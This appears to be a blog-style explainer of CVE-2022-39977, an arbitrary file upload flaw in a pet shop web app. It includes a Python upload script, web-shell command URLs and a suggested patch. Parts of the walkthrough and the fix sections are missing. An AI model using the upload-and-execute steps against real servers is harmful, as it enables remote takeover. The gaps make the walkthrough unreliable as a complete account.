CVE-2022-39977 - How Attackers Exploit the Arbitrary File Upload in Online Pet Shop Web App v1.

In 2022, security researchers discovered a critical vulnerability in the Online Pet Shop Web App v1.. Tracked as CVE-2022-39977, this flaw allows attackers to upload dangerous files through the User account editing function, potentially letting them take control of the entire web server. In this post, we'll break down how the vulnerability works, show code snippets of the exploit, reference official sources, and explain the potential impact in straightforward terms.

What is CVE-2022-39977?

CVE-2022-39977 is an arbitrary file upload vulnerability. That means it allows anyone with access (like a registered user) to upload any file—like a piece of malicious PHP code—through the user profile picture update feature. Once uploaded, the attacker can execute that file on the server, which could lead to remote code execution (RCE).

Where is the Vulnerability?

The flaw is in the Editing function in the User module, especially the part that handles the uploading of profile pictures. The application does not properly check the type or contents of the uploaded file.

Suppose the profile update code looks something like this (illustrative, not the real code)

if(isset($_FILES['picture'])){
    $file_name = $_FILES['picture']['name'];
    $file_tmp = $_FILES['picture']['tmp_name'];
    move_uploaded_file($file_tmp, "uploads/" . $file_name);
}

What's missing here is any check on whether the uploaded file is an actual image or not. This allows an attacker to upload a .php file instead of an image.

Go to your profile edit page, where you can upload a new profile picture.

3. Instead of uploading a real image, the attacker prepares a malicious PHP file (for example, shell.php):

`

http://example.com/uploads/shell.php?cmd=ls

Here's how you could automate the upload (for educational purposes only)

import requests

url = 'http://example.com/user/edit.php';
files = {'picture': open('shell.php', 'rb')}
data = {'username': 'your_username', 'submit': 'Update'}
# You may need to handle authentication; this is simplified.
response = requests.post(url, files=files, data=data, cookies={'PHPSESSID': '...'})
print(response.status_code)

After upload, the attacker can browse to

http://example.com/uploads/shell.php?cmd=id

What Is the Risk?

- Remote Code Execution: Attackers can run any command on the web server. They may steal data, change files, or even use the server to attack others.

Web Shells: Attackers can create a "web shell" for ongoing access.

- Full Takeover: If the web server has more privileges, an attacker could fully compromise the site or even the entire host machine.

Official References

- NVD - CVE-2022-39977
- Exploit-DB 50925  
- GitHub Advisory  
- Full Disclosure mailing list report

How Can You Fix This?

For Developers:

Example Patch

$allowed_types = array(IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG);
$detected_type = exif_imagetype($_FILES['picture']['tmp_name']);
if (!in_array($detected_type, $allowed_types)) {
    die("This file type is not allowed");
}

For Users:

Final Thoughts

CVE-2022-39977 is a good example of how poor validation in file uploads can give attackers the keys to the kingdom. Web developers should always be wary of file upload features, and site owners must keep their apps updated to avoid becoming a target.

If your organization is using Online Pet Shop Web App v1., patch and fix this vulnerability immediately.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:07:00 UTC